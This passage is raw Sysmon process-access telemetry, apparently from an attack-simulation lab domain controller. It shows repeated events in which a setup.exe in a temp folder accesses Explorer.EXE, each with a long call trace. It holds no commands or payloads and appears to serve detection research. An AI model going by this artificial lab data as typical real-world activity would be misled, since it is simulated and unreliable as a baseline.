f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000016104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000016100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000016097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.896{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.d